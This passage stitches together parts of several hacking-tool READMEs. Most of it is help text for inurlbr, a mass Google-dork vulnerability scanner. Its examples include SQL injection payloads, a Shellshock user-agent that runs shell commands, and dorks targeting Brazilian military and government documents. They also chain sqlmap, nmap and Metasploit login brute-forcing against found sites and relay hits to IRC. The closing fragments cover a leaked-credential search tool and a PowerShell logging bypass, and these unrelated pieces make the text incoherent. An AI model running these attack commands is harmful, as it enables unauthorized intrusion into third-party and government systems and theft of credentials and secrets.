     Usage:   --dork-file 'dorks.txt'

 --exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'´%270x27;"

 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

 --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.   
     The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_      
     Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
     _TARGET_ is the specified URL/TARGET obtained by the process
     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
     Example: --exploit-command {exploit-command}
     Usage:   --exploit-command '/admin/config.conf'  

 -a  Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:   -a '<title>hello world</title>'

 -d  Specify the script usage op 1, 2, 3, 4, 5.
     Example: -d {op}
     Usage:   -d 1 /URL of the search engine.
              -d 2 /Show all the url.
              -d 3 /Detailed request of every URL.
              -d 4 /Shows the HTML of every URL.
              -d 5 /Detailed request of all URLs.
              -d 6 /Detailed PING - PONG irc.    

 -s  Specify the output file where it will be saved the vulnerable URLs.

     Example: -s {file}
     Usage:   -s your_file.txt

 -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
     Example: -o {file_where_my_urls_are}
     Usage:   -o tests.txt

 --persist  Attempts when Google blocks your search.
     The script tries to another google host / default = 4
     Example: --persist {number_attempts}
     Usage:   --persist 7

 --ifredirect  Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

 -m  Enable the search for emails on the urls specified.

 -u  Enables the search for URL lists on the url specified.

 --gc Enable validation of values ​​with google webcache.

 --pr  Progressive scan, used to set operators (dorks), 
     makes the search of a dork and valid results, then goes a dork at a time.

 --file-cookie Open cookie file.

 --save-as Save results in a certain place.

 --shellshock Explore shellshockvulnerability by setting a malicious user-agent.

 --popup Run --command all or vuln in a parallel terminal.

 --cms-check Enable simple check if the url / target is using CMS.

 --no-banner Remove the script presentation banner.

 --unique Filter results in unique domains.

 --beep Beep sound when a vulnerability is found.

 --alexa-rank Show alexa positioning in the results.

 --robots Show values file robots.

 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5#172.16.0.255'

 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

 --irc Sending vulnerable to IRC / server channel.
      Example: --irc {server#channel}
      Usage:   --irc 'irc.rizon.net#inurlbrasil'

 --http-header Set HTTP header.
      Example: --http-header {youemail}
      Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

 --sedmail Sending vulnerable to email.
      Example: --sedmail {youemail}
      Usage:   --sedmail youemail@inurl.com.br

 --delay Delay between research processes.
      Example: --delay {second}
      Usage:   --delay 10

 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 10

 --ifurl Filter URLs based on their argument.
      Example: --ifurl {ifurl}
      Usage:   --ifurl index.php?id=

 --ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

 --ifemail Filter E-mails based on their argument.
     Example: --ifemail {file_where_my_emails_are}
     Usage:   --ifemail sp.gov.br

 --url-reference Define referring URL in the request to send him against the target.
      Example: --url-reference {url}
      Usage:   --url-reference http://target.com/admin/user/valid.php

 --mp Limits the number of pages in the search engines.
     Example: --mp {limit}
     Usage:   --mp 50

 --user-agent Define the user agent used in its request against the target.
      Example: --user-agent {agent}
      Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
      Usage-exploit / SHELLSHOCK:   
      --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
      Complete command:    
      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'

 --sall Saves all urls found by the scanner.
     Example: --sall {file}
     Usage:   --sall your_file.txt

 --command-vul Every vulnerable URL found will execute this command parameters.
     Example: --command-vul {command}
     Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'
              --command-vul './exploit.sh _TARGET_ output.txt'
              --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

 --command-all Use this commmand to specify a single command to EVERY URL found.
     Example: --command-all {command}
     Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'
              --command-all './exploit.sh _TARGET_ output.txt'
              --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
    [!] Observation:

    _TARGET_ will be replaced by the URL/target found, although if the user  
    doesn't input the get, only the domain will be executed.

    _TARGETFULL_ will be replaced by the original URL / target found.

    _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.

    _TARGETIP_ return of ip URL / target found.

    _URI_ Back URL set of folders / target found.

    _RANDOM_ Random strings.

    _PORT_ Capture port of the current test, within the --port-scan process.

    _EXPLOIT_  will be replaced by the specified command argument --exploit-command.
   The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

 --replace Replace values ​​in the target URL.
    Example:  --replace {value_old[INURL]value_new}
     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'

 --remove Remove values ​​in the target URL.
      Example: --remove {string}
      Usage:   --remove '/admin.php?id=0'

 --regexp Using regular expression to validate his research, the value of the 
    Expression will be sought within the target/URL.
    Example:  --regexp {regular_expression}
    All Major Credit Cards:
    Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'

    IP Addresses:
    Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'

    EMAIL:   
    Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


 ---regexp-filter Using regular expression to filter his research, the value of the 
     Expression will be sought within the target/URL.
    Example:  ---regexp-filter {regular_expression}
    EMAIL:   
    Usage:    ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


    [!] Small commands manager:

 --exploit-cad Command register for use within the scanner.
    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
    Example Format: NMAP::nmap -sV _TARGET_
    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
    Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_' 
    Observation: Each registered command is identified by an id of your array.
                 Commands are logged in exploits.conf file.

 --exploit-all-id Execute commands, exploits based on id of use,
    (all) is run for each target found by the engine.
     Example: --exploit-all-id {id,id}
     Usage:   --exploit-all-id 1,2,8,22

 --exploit-vul-id Execute commands, exploits based on id of use,
    (vull) run command only if the target was considered vulnerable.
     Example: --exploit-vul-id {id,id}
     Usage:   --exploit-vul-id 1,2,8,22

 --exploit-list List all entries command in exploits.conf file.


    [!] Running subprocesses:

 --sub-file  Subprocess performs an injection
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get

 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get


 --sub-cmd-vul Each vulnerable URL found within the sub-process
     will execute the parameters of this command.
     Example: --sub-cmd-vul {command}
     Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
              --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

 --sub-cmd-all Run command to each target found within the sub-process scope.
     Example: --sub-cmd-all {command}
     Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-all './exploit.sh _TARGET_ output.txt'
              --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'


 --port-scan Defines ports that will be validated as open.
     Example: --port-scan {ports}
     Usage:   --port-scan '22,21,23,3306'

 --port-cmd Define command that runs when finding an open door.
     Example: --port-cmd {command}
     Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'
              --port-cmd './xpl _TARGETIP_/file.php?sqli=1'

 --port-write Send values for door.
     Example: --port-write {'value0','value1','value3'}
     Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"



    [!] Modifying values used within script parameters:

 md5 Encrypt values in md5.
     Example: md5({value})
     Usage:   md5(102030)
     Usage:   --exploit-get 'user?id=md5(102030)'

 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'

 Generate random values.
     Example: random({character_counter})
     Usage:   random(8)
     Usage:   --exploit-get 'user?id=random(8)'

docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  

docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" 

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'        

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt  --exploit-get ?´0x27  --command-vul 'nmap sV -p 22,80,21 _TARGET_'

docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'

docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

docker exec inurlbr ./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id  1,2,6  

docker exec inurlbr ./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent  'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' 

docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id  1,2,6 

docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id  1,2,6  --irc 'irc.rizon.net#inurlbrasil'   

docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'  

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

docker exec inurlbr ./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'  

docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'  

docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8  

docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8   --pr

docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock

docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8  --sub-file 'xpls_Arbitrary_File_Download.txt'  

----------------------------------------------
                Original Version
----------------------------------------------
  [+] AUTOR:        googleINURL
  [+] EMAIL:        inurlbr@gmail.com
  [+] Blog:         http://blog.inurl.com.br
----------------------------------------------
                Docker Version
----------------------------------------------
  [+] AUTOR:        Gabriel Dutra (c0olr00t)
  [+] EMAIL:        gabrieldmdutra@gmail.com
  [+] LINKEDIN:     linkedin.com/in/gmdutra/
----------------------------------------------

- Python 3.0 or later.
- pip3 (sudo apt-get install python3-pip)

git clone https://github.com/Viralmaniar/SMWYG-Show-Me-What-You-Got.git
cd SMWYG-Show-Me-What-You-Got
pip3 install -r requirements.txt

• Press 1: This will allow one to search credentials based on domain name.
• Press 2: This will allow one to search credentials for a specific email address.
• Press 3: To exit from the program.

• Change your passwords every few months
• Use differnt passwords for different accounts
• Use password manager to generate random passwords
• Start using multi factor authentication

• Copy the compiled InvisiShellProfiler.dll from /x64/Release/ folder with the two batch files from the root directory (RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat) to the same folder.
• Run either of the batch files (depends if you have local admin privelledges or not)
• Powershell console will run. Exit the powershell using the exit command (DON'T CLOSE THE WINDOW) to allow the batch file to perform proper cleanup.

• CorProfiler by .NET Foundation
• Eyal Ne'emany
• Guy Franco
• Ephraim Neuberger
• Yossi Sassi
• Omer Yair